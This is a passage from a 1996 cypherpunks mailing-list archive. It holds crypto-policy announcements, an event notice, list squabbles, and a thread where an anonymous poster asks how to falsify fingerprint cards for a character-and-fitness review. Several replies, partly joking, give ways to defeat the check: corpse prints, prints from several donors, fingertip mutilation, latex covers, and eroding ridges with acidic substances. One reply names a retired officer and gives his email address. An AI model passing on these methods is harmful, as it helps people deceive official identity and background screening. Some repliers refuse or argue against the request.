contracting with a man of honor.  I did the work and got paid.)  IMHO, it
beats the hell out of 3 months dealing with corporate legal.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 14 May 1996 15:35:44 +0800
To: Senator Exon <remailer@2005.bart.nl>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <199605131344.PAA05388@spoof.bart.nl>
Message-ID: <Pine.SCO.3.91.960513134249.7157D-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 May 1996, Senator Exon wrote:

<snip>
> i can fill out and manipulate the card myself i just need a
> working method.
> is there no privacy advocate who can help me?
> 

I think most privacy advocates would advise, "Refuse to submit."  It 
sounds like you're looking for more of a hack on the fingerprinting process.

Normally, you're not going to be allowed to manipulate the card yourself. 
You're going to have to be printed by a "tech" (read: trusted by big
brother) who's going to ensure that those prints are really yours.  Sort
of like a key certificate.  If you really can dork the card, have ten
different people volunteer one print each.  There's no way that they'll
ever be able to use that as evidence in a court or for any other purpose,
either.

Another fun thing to do is to use prints from dead people.  A
friend who works in a hospital can help.  Medical students can sometimes
get access to dead bodies, but many used for teaching purposes (the
bodies, not the students) already have the skin removed, thus they have no
prints.  Best to examine those dead digits yourself before sneaking in the
card and ink.  I also understand that taking prints from a corpse can be 
difficult, so plan on having a friend help or on having some rigging 
equipment to get the appropriate positioning for the body.  Pre-detached 
or detachable limbs would be helpful. 

If you're forced to do this in person with a tech, you can continuously 
"fight" the grip they have on your hand and smudge the card.  However, 
they'll not submit the card until the prints are "good," so this sort of 
betrays your intent of at least appearing to cooperate with them.  In the 
law enforcement community, they are taught how to take prints by force 
but it's unlikely that your tech will attempt any such technique.

You can mutilate the tips of your fingers so that prints cannot be 
acquired, but this hurts.  Badly.

You could get some false latex coverings for your finger tips, but they'd 
have to be damn good to fool a tech.  Likely to cost big bucks, too.

I know of no chemical or physical "pre-treatment" that can be used to 
hack the ink transference process.  Perhaps one of the chemists here on 
the list might know of some good technique.

If you want professional help, I've heard talk of a fingerprint expert in
California who offers expert testimony in courts, and so forth.  His name
is Greg Moore.  He is, however, a retired cop.  I do not know how willing
he'd be to give you expert advice on hacking a fingerprint card, but it's
worth a try.  He would most likely at least answer some questions about 
the fingerprinting process, depending upon how pleading and helpless you 
can sound.  You can reach him at gmoore@lightlink.satcom.net.  He 
may be willing to help you for free, or perhaps for a fee. 
 
------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@GS160.SP.CS.CMU.EDU
Date: Tue, 14 May 1996 13:51:46 +0800
To: cypherpunks@toad.com
Subject: Re: Transitive trust and MLM
In-Reply-To: <+cmu.andrew.internet.cypherpunks+UlYwNe:00UfAM107VG@andrew.cmu.edu>
Message-ID: <199605131833.LAA14629@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <+cmu.andrew.internet.cypherpunks+UlYwNe:00UfAM107VG@andrew.cmu.edu>
EALLENSMITH@ocelot.Rutgers.EDU writes:
>	The different paths going through those different signatures will be
>correlated/non-independent, yes.... but that isn't the problem unless you're
>considering multiple paths (in a more complicated version).

To determine key validity, you do have to consider all paths.  If a
single trusted path to the bad key exists, the attacker wins.

>	IIRC, there have been some sociological studies showing that _everyone_
>is linked through 6 or so people.

Milgram's "small world" experiments used a much looser sort of "link"
than we want here.  It would be certainly interesting to know how
large a difference this makes.

> Now, there's the question of whether you _need_ to be linked to everyone - 
> [...] I see nothing wrong (and am in favor of) separation of the
> elite from the masses.

Gee, let me guess which group you're in... I'll go with "people I want
to talk to" versus "people I don't want to talk to", thanks.

It's true that you don't need to talk to everybody.  The problem is
that I might want to talk to people whom I don't know personally, but
know by reputation, or by function ("DEA Rat Hotline" -- well, maybe
not).

-- 
. Eli Brandt                                        usual disclaimers .
. eli+@cs.cmu.edu                                  PGP key on request .
. violation of 18 U.S.C. 1462:                                  "fuck".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Tue, 14 May 1996 16:58:54 +0800
To: cypherpunks@toad.com
Subject: Senator Burns at HotWired Today
Message-ID: <199605132212.PAA14057@well.com>
MIME-Version: 1.0
Content-Type: text


Monday, 13 May
6 p.m. PDT

                   Senator Conrad Burns
                   in WiredSide Chat
                   Senator Conrad Burns (R-Montana) has recently
                   introduced legislation to make it easier for
                   netizens to get strong, easy-to-use privacy and
                   security tools for the Internet. The Pro-CODE bill
                   (S. 1726) aims a silver bullet straight at the heart
                   of the Clinton administration's unworkable
                   Clipper and Clipper II schemes by rolling back
                   Cold War-era regulations on the export of strong
                   cryptography. Join us Monday, 13 May at 6 p.m.
                   (Tuesday 01:00 GMT) to talk technology with
                   Washington. 

-- 

Jon Lebkowsky <jonl@wired.com>                     http://www.well.com/~jonl
Electronic Frontiers Forum, 7PM PST Thursdays  <http://www.hotwired.com/eff>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remailer@2005.bart.nl (Senator Exon)
Date: Tue, 14 May 1996 04:36:11 +0800
To: cypherpunks@toad.com
Subject: Fingerprinting annoyance
Message-ID: <199605131344.PAA05388@spoof.bart.nl>
MIME-Version: 1.0
Content-Type: text/plain


in connection with a character and fitness report i have been
asked to supply a review board with a set of my fingerprints
i have never been fingerprinted before
i am not very keen on the idea now
of course refusing will attract suspicion
short of getting someone else to put their fingers in ink for
me does anyone have a cute method by which to obscure my prints
on those cute little cards without it being obvious?
i can fill out and manipulate the card myself i just need a
working method.
is there no privacy advocate who can help me?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Tue, 14 May 1996 15:42:57 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.18 - Join Sen. Burns online TONIGHT (5/13) at 9:00 ET
Message-ID: <v02140b0cadbd43e8389b@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
   _____ _____ _______
  / ____|  __ \__   __|   ____        ___               ____             __
 | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
 | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
 | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
  \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
  The Center for Democracy and Technology  /____/     Volume 2, Number 18
----------------------------------------------------------------------------
     A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 18                           May 13, 1996

 CONTENTS: (1) Join Senator Burns online TONIGHT (5/13) at 9:00 ET to discuss
               Privacy and Security on the Net
           (2) Subscription Information
           (3) About CDT, contacting us

  ** This document may be redistributed freely with this banner in tact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
-----------------------------------------------------------------------------

(1) JOIN SENATOR BURNS ON HOTWIRED TONIGHT (5/13) AT 9:00 ET ON TO DISCUSS
    PRIVACY AND SECURITY ON THE NET

Senator Conrad Burns (R-MT) will hold a second online 'town meeting' tonight
to discuss recently introduced encryption legislation.  The Promotion of
Commerce Online in the Digital Era (Pro-CODE) Act of 1996 (S.1726), sponsored
by Sen. Burns, Sen. Patrick Leahy (D-VT) and others, seeks to relax outdated
and restrictive export controls on encryption.

This online chat is the second chance in as many weeks for Netizens to
participate in a discussion regarding this important legislation.  We hope
many concerned Internet users will take advantage of this rare opportunity
to interact with a U.S. Senator who is leading the fight on an issue of great
importance to the Net.community.

DETAILS ON TONIGHT'S EVENT:

* Monday May 13, at 9:00 pm ET (6:00 pm Pacific) on HotWired's "Wireside
  Chat".

  URL: http://www.hotwired.com/wiredside/

  To participate, you must be a registered HotWired member (there
  is no charge for registration).  You must also have RealAudio(tm) and a
  telnet application properly configured to work with your browser.

Tonight's town meeting is the second in a series of planned events, and is
part of a broader project coordinated by CDT and the Voters
Telecommunications Watch (VTW) designed to bring the Internet Community
into the debate and encourage members of Congress to work with the
Net.community on vital Internet policy issues.

Events with other members of Congress working on Internet Policy Issues are
currently being planned. Stay tuned for future announcements.

----------------------------------------------------------------------------
FOR MORE INFORMATION ON THE ENCRYPTION POLICY DEBATE

For more information on the Encryption Policy Debate, please visit CDT's
encryption policy issues page at

 http://www.cdt.org/crypto/

You can also join CDT, VTW, EFF, EPIC, People for the American Way, Wired
Magazine, and others in an online campaign to promote secure communications
online.  For more information, visit:

* The Encryption Policy Resource Page  --   http://www.crypto.com/
* The Internet Privacy Coalition Page  --   http://www.privacy.org/ipc
* EFF's Crypto Page                    --   http://www.eff.org/
* EPIC's Crypto Page                   --   http://www.epic.org/crypto
* VTW's Crypto Page                    --   http://www.vtw.org/

-----------------------------------------------------------------------------
(2) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
more than 9,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------
(3) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.18                                           5/13/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mathew Ellman <mellman@niia.net>
Date: Tue, 14 May 1996 17:03:11 +0800
To: cypherpunks@toad.com
Subject: TO ALL MEMBERS
Message-ID: <199605132111.QAA00205@silver.niia.net>
MIME-Version: 1.0
Content-Type: text/plain


TO ALL MEMBERS, 
        IM TIRED OF ALL THIS SHIT I HAVE UNSUBSCRIBED MANY TIMES AND ALL I
GET IS SOME STUPID ASS REPLY ABOUT CLOSED LIST OR ADDRESS NOT MATCHING AND I
GET NO REPLY SO UNLESS YOU ALL WANT TO GET A BUNCH OF UN WANTED BULLSHIT
(LIKE THE SHIT IM GETING FROM YOU ) I SUGEST SOMEONE FIND A WAY TO GET ME
THE FUCK OFF THIS LIST . I HAVE GOT IN TOUCH WITH THE PESON THE REPLY TELL
ME TO AND NO REPLY. IM TIRED OF ALL THIS SHIT. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kari Laine <buster@klaine.pp.fi>
Date: Tue, 14 May 1996 04:40:57 +0800
To: ECafe Anonymous Remailer <cypherpunks@toad.com
Subject: Re: NSA Budget
In-Reply-To: <199604090146.CAA03627@pangaea.hypereality.co.uk>
Message-ID: <MAPI.Id.0016.00617269204c61693339334630304535@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain



>Is there a public release of the NSA's annual Budget.
>If so is there a quarterly release. -Erinn

*Which* one of them you are interested 
- one for the public
- one for the foes
- one for the allies
- one for the ....

Why don't you call them up and ask nicely <grin>


-----

   Yes, there are annual and quarterly reports released to the
   public which describe in meticulous detail expenditures for

	<big cutout>

Original text for the good reporting practises was
really enjoyable reading.


Kari





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Tue, 14 May 1996 17:30:09 +0800
To: mellman@niia.net
Subject: Re: TO ALL MEMBERS
In-Reply-To: <199605132111.QAA00205@silver.niia.net>
Message-ID: <3o8lx8m9LQzC085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199605132111.QAA00205@silver.niia.net>,
Mathew Ellman <mellman@niia.net> wrote:
> TO ALL MEMBERS, 
>         IM TIRED OF ALL THIS SHIT I HAVE UNSUBSCRIBED MANY TIMES AND ALL I
> GET IS SOME STUPID ASS REPLY ABOUT CLOSED LIST OR ADDRESS NOT MATCHING AND I
> GET NO REPLY SO UNLESS YOU ALL WANT TO GET A BUNCH OF UN WANTED BULLSHIT
> (LIKE THE SHIT IM GETING FROM YOU ) I SUGEST SOMEONE FIND A WAY TO GET ME
> THE FUCK OFF THIS LIST . I HAVE GOT IN TOUCH WITH THE PESON THE REPLY TELL
> ME TO AND NO REPLY. IM TIRED OF ALL THIS SHIT. 
> 
> 

To: majordomo@c2.org
Subject: subscribe clueless mellman@niaa.net

subscribe clueless mellman@niaa.net

- -- 
Alan Bostick               | "The thing is, I've got rhythm but I don't have
mailto:abostick@netcom.com | music, so I guess I could ask for a few more 
news:alt.grelb             | things." (overheard)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMZfKfuVevBgtmhnpAQGHgQMAjE9RlL3Ivsvew2tpuAHUzbWwXRA76gBX
+o2ShOZFYJcxOb0Hw4nimCV+avuulztxJcPecAFimQ12qUOmLTs654I+Iy8tIAYm
uLEtUbs66aghUMHrb01fvclbn2bgX2Hq
=KMy4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 14 May 1996 16:51:30 +0800
To: cypherpunks@toad.com
Subject: DCSB: The FSTC Electronic Check Project
Message-ID: <v03006601adbd5975730e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


                 The Digital Commerce Society of Boston

                               Presents

                              Frank Jaffe,
                      of The Bank of Boston and
          The Financial Services Technology Consortium (FSTC)


                  "The FSTC Electronic Check Project"


                        Tuesday, June 4, 1996
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Frank Jaffe is a Senior Systems Consultant in the Applied Technology Group at
the Bank of Boston.  Frank is currently the project manager for the FSTC
Electronic Check project which involves over 30 companies.  Frank has
played a leadership role in planning the amalgamation of Bank of Boston's five
major retail computer systems into a single, common software system; acting
as project leader for a new teller system, and leading the screen phone R&D
project in cooperation with Northern Telecom and Bellcore.


The FSTC Electronic Check project will develop an enhanced all-electronic
replacement to the paper check. Electronic checks will be used like paper
checks, by businesses and consumers, and will use existing inter-bank
clearing systems. Like its paper counterpart, the Electronic Check
represents a self contained "information object," which has all of the
information necessary to complete a payment. Likewise, paper checkbooks are
replaced by portable Electronic Checkbooks; pens & signatures are replaced
by signature card functions and digital signatures using advanced
cryptographic techniques; stamps and envelopes by electronic mail or other
communications options such as the World Wide Web over the Internet.

The fully automated processing capabilities of Electronic Checks opens the
possibility of other types of financial instruments, such as electronic
cashiers, travelers, and certified checks. Electronic check writing and
processing will be integrated into existing applications, from cash
registers to personal checkbook managers to large corporate accounting
systems, to greatly increase the convenience, and reduce the costs, of
writing, accepting, and processing checks.



This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, June 4, 1996 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have dress code: jackets and ties for men, and
"appropriate business attire" for women.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, May 4, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be sent
back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 July        Pete Loshin      Author, "Electronic Commerce"
 August      Duane Hewitt     Idea Futures

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZec9fgyLN8bw6ZVAQHb/wP9FrQXK4sCBRnfqNt2bJTzWX5BpxDC4NXY
RZjQfNP6coAvjh1nc1gNVHcFFgCB2Mh8Mmt876gJr48JUfWpMIQ3XW4CKuqjY6NQ
Bw/SRarICPNLSCMbsdX2kHYwi1OuMwkVYm9rXotF4byrDItdxursXacxvvdYyW/u
mZMx+eXWq1E=
=hXUa
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 14 May 1996 17:33:55 +0800
To: cypherpunks@toad.com
Subject: Re: S-Tools 4 now available
In-Reply-To: <01BB40CF.624B4A90@mirage.nexor.co.uk>
Message-ID: <960513.174125.5s4.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, a.brown@nexor.co.uk writes:

> S-Tools version 4 is now available from the following URL:
>
>   ftp://idea.sec.dsi.unimi.it/pub/security/crypt/code/s-tools4.zip
>
> You will need either Windows 95 or Windows NT (at least v3.51) to use
> this, and all further releases of S-Tools (Win32s is not sufficient).

<sigh>

I suppose this is market pressure, but it means you are alienating a
number of potential users (including myself).  Some of us are working
toward being Microsoft-free, you know.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZe7HBvikii9febJAQFcfgP/dd8au1P5by9VtL+Ozaf3D3tunlFUPS9m
1TaO6d369eDnetZR2pdmhEFPZgl8VBmoeBi9yOiZK+Nzw4V/r+5y3FUtiVl8wHsx
5y+6GNl8LNgGlnDFxuP144rvzXfNl0REDNzc4DCpOr0nz3zc8h7gdRiGpnOW45/A
tNw3TMJB4N0=
=oqqi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 14 May 1996 15:50:14 +0800
To: cypherpunks@toad.com
Subject: Re: Fingerprinting annoyance
In-Reply-To: <199605131344.PAA05388@spoof.bart.nl>
Message-ID: <Pine.GUL.3.93.960513172942.14881J-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 May 1996, Senator Exon <remailer@2005.bart.nl> wrote:

> in connection with a character and fitness report i have been
> asked to supply a review board with a set of my fingerprints
> i have never been fingerprinted before
> i am not very keen on the idea now
> of course refusing will attract suspicion

Honorable Senator, if you wish to work for the government (or certain
other orgs with a big impact on the public, or in certain highly sensitive
posts, like armed security guard), then you simply have to put up with
this. Especially if you're working for *my* government, or flying *my*
airplane, or guarding *my* money, it's not in my interest to help you.

So... don't work for the government. Work for yourself, or for someone who
treats you like a grownup. Liberty ain't always free and easy.

> short of getting someone else to put their fingers in ink for
> me does anyone have a cute method by which to obscure my prints
> on those cute little cards without it being obvious?

Sneak into a morgue (I assume you wouldn't even consider involving a third
party who isn't already dead).

See to it that you're never fingerprinted a second time. 

Actually, if you simply give them a mirror image of your prints, some
matching techniques might fail... 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 14 May 1996 15:42:15 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.SCO.3.91.960513134249.7157D-100000@grctechs.va.grci.com>
Message-ID: <Pine.SV4.3.91.960513182710.21739J-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


He who wants an Other Guy to certify him as a good guy is a supplicant. If 
the Other Guy wants you to get naked and stand on your hands in front of 
the Dutch Queen's front lawn, then that's their rule and you make your 
choice about obeying.

If the Other Guy wants your fingerprints so he can check whether you're 
escaped from prison for a mail fraud conviction, well: that's their rule.
If you want the Other Guy to certify your good character, then give your 
fingerprints. If you don't like it, then ply your trade without their 
peice of paper. You don't have a God-given right to have the peice of paper.

Your customers and clients can decide if they still want to hire you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name Withheld by Request)
Date: Tue, 14 May 1996 11:30:13 +0800
To: rpowell@algorithmics.com.cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <199605131815.UAA04830@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Robin Powell wrote:
>>>>>> Black Unicorn <unicorn@schloss.li> writes:
>    > On Sun, 12 May 1996, Mixmaster wrote:
>    >> if you spend $50k. Or do it yourself for $1k. Start by reading
>    >> everything from Scope (www.britnet.co.uk/scope). The books you find
>    >                   ^^^^^
>    >> there cover everything you need to know in perfect detail.
>
>    > Woops.  What dwindling credibility you had in my view is now gone.
>    > Poof and -PLOINK-.
>
>    > (I suggest cypherpunks so interested pursue other options).
>
>Any particular reason why this statement lost that person's
>credibility for you that you'd like to share with us?  Have someone
>say, "Man, that site sucks!" is of very little use without knowing
>what the problem is so we can avoid it in the future.

The reason should be obvious from the earlier discussion. Mr. Unicorn
is in the deluxe tax planning business. He is worried that his costomers
will stop paying $50-100k for his services if they find out that they just
need to spend $100 in the book store for even better advice.

X

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMZdmjVtwWVJrMFYlAQG/7Qf/Znhd2nJlWsKCsgQ0GYBbxcYJLqHL+4tw
Dmco49A17P3wbukKxMxY/5qkNEFZTBfLZXsH+pmkWNncv+5OYrMqjusV1OnAB8Ab
3eDWrNH3i7ga6yf1AHPg54nwOBFXDgMNG3U76tQwSb9NWF7YCMah+3TEtBlNi5/9
nSnq7fLKQjc3wT37DwaZHxbOOSloEPuJKD3WTxdCvfkL4lu9HcAFN2oBjag3XDu/
ikpxNJzRsYwzpCOgMX4cXxDY3E5cHKrxdi1XRj1cfgIR//C1kqnV9VgWpfbm/qBh
PT8GFdjLT/r9y1t4TUhjJC7GPWhIbFDwjsTFD/bATWwsnfQ8pTTHPQ==
=XDO+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Tue, 14 May 1996 18:01:57 +0800
To: cypherpunks@toad.com
Subject: Re: Fingerprinting annoyance
In-Reply-To: <199605131344.PAA05388@spoof.bart.nl>
Message-ID: <Pine.3.89.9605132022.A29528-0100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 13 May 1996, Senator Exon wrote:

> in connection with a character and fitness report i have been
> asked to supply a review board with a set of my fingerprints
> i have never been fingerprinted before
> i am not very keen on the idea now
> of course refusing will attract suspicion
> short of getting someone else to put their fingers in ink for
> me does anyone have a cute method by which to obscure my prints
> on those cute little cards without it being obvious?
> i can fill out and manipulate the card myself i just need a
> working method.
> is there no privacy advocate who can help me?
> 

First off, if you were born in the US, they have your feet and/or hand 
prints on record. Secondly, fingerprints are not an absolute proof 
positive means of identification. They are sufficiently unique enough 
that it satisfies the statistical error acceptability for many 
governmental agencies.

I wouldn't worry about it personally. There are more effective ways of 
getting around such things if you really need to. If you don't have any 
historical baggage, then don't make waves.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Tue, 14 May 1996 19:27:14 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.SCO.3.91.960513134249.7157D-100000@grctechs.va.grci.com>
Message-ID: <Pine.3.89.9605132007.A29528-0100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 13 May 1996, Mark O. Aldrich wrote:

> On Mon, 13 May 1996, Senator Exon wrote:
> 
> <snip>
> > i can fill out and manipulate the card myself i just need a
> > working method.
> > is there no privacy advocate who can help me?
> > 
> 
> I think most privacy advocates would advise, "Refuse to submit."  It 
> sounds like you're looking for more of a hack on the fingerprinting process.

You can refuse, and the service or permit applied for will be witheld. 
Not very productive.

> 
> Normally, you're not going to be allowed to manipulate the card yourself. 
> You're going to have to be printed by a "tech" (read: trusted by big
> brother) who's going to ensure that those prints are really yours.  Sort
> of like a key certificate.  If you really can dork the card, have ten
> different people volunteer one print each.  There's no way that they'll
> ever be able to use that as evidence in a court or for any other purpose,
> either.
> 
> Another fun thing to do is to use prints from dead people.  A
> friend who works in a hospital can help.  Medical students can sometimes
> get access to dead bodies, but many used for teaching purposes (the
> bodies, not the students) already have the skin removed, thus they have no
> prints.  Best to examine those dead digits yourself before sneaking in the
> card and ink.  I also understand that taking prints from a corpse can be 
> difficult, so plan on having a friend help or on having some rigging 
> equipment to get the appropriate positioning for the body.  Pre-detached 
> or detachable limbs would be helpful. 
> 
> If you're forced to do this in person with a tech, you can continuously 
> "fight" the grip they have on your hand and smudge the card.  However, 
> they'll not submit the card until the prints are "good," so this sort of 
> betrays your intent of at least appearing to cooperate with them.  In the 
> law enforcement community, they are taught how to take prints by force 
> but it's unlikely that your tech will attempt any such technique.
> 

I know of no such instance (other than some informal "fingerprint the 
kiddies for safety" schtick) where it's a do-it--yourself operation. 

While the methods listed are clever, they and many other finaglings are 
the main reason it's done in the "light of day" by a tech.

> You can mutilate the tips of your fingers so that prints cannot be 
> acquired, but this hurts.  Badly.

Doesn't always work. Partials can be extrapolated to yield a relative match.

> 
> You could get some false latex coverings for your finger tips, but they'd 
> have to be damn good to fool a tech.  Likely to cost big bucks, too.

Wont work. The hands are checked first for signs of tampering.

> 
> I know of no chemical or physical "pre-treatment" that can be used to 
> hack the ink transference process.  Perhaps one of the chemists here on 
> the list might know of some good technique.

Pineapple juice and other weak acidic subtances ruin the ridges on the 
finger tips causing them to smear or not show at all. Unfortunately, this 
takes a period of time and constant handling of such items.

> 
> If you want professional help, I've heard talk of a fingerprint expert in
> California who offers expert testimony in courts, and so forth.  His name
> is Greg Moore.  He is, however, a retired cop.  I do not know how willing
> he'd be to give you expert advice on hacking a fingerprint card, but it's
> worth a try.  He would most likely at least answer some questions about 
> the fingerprinting process, depending upon how pleading and helpless you 
> can sound.  You can reach him at gmoore@lightlink.satcom.net.  He 
> may be willing to help you for free, or perhaps for a fee. 
>  

There may be a book or to on the subject. The local library may carry 
refernce or other materials on police, detective and forensics. You 
can also try Revolution Books in Seattle WA. They deal in the esoteric.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Tue, 14 May 1996 18:40:52 +0800
To: cypherpunks@toad.com
Subject: Re: Notes from the SF Physical Cypherpunks meeting
Message-ID: <v02140b04adbdbf22398d@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to everyone who took the trouble to correct errors in my
notes from Saturday's Cypherpunks meeting. They were written
for my own benefit -- and for the benefit of some friends who
couldn't be there. Since I can give away information without
losing it (to misquote Thomas Jefferson), I'm happy to share it
with the cypherpunks.

A comment from Matts Kallioniemi might be worth some further discussion:

>>COM e-mail/bbs system (Sweden) -- operator could backup
>>e-mail, but not read it.
>
>Sure. The database was encrypted by using XOR with the string
>"KOM". That was the sorry state of encryption in the early eighties.
>

Encrypting the database with a fixed string offers a good example
of how "locks keep honest people honest." This would prevent an
operator from unintentionally reading a message in case it was
revealed by, perhaps, a disk sector editor or crash dump.

I suspect that the state of encryption in Sweden in the early
eighties was somewhat stronger than XOR (wasn't Hagelin a Swede who
moved to Switzerland to start Crypto AG?), but not necessarily
visible to the general public.

The Swedish government has a rather strong tradition of protection
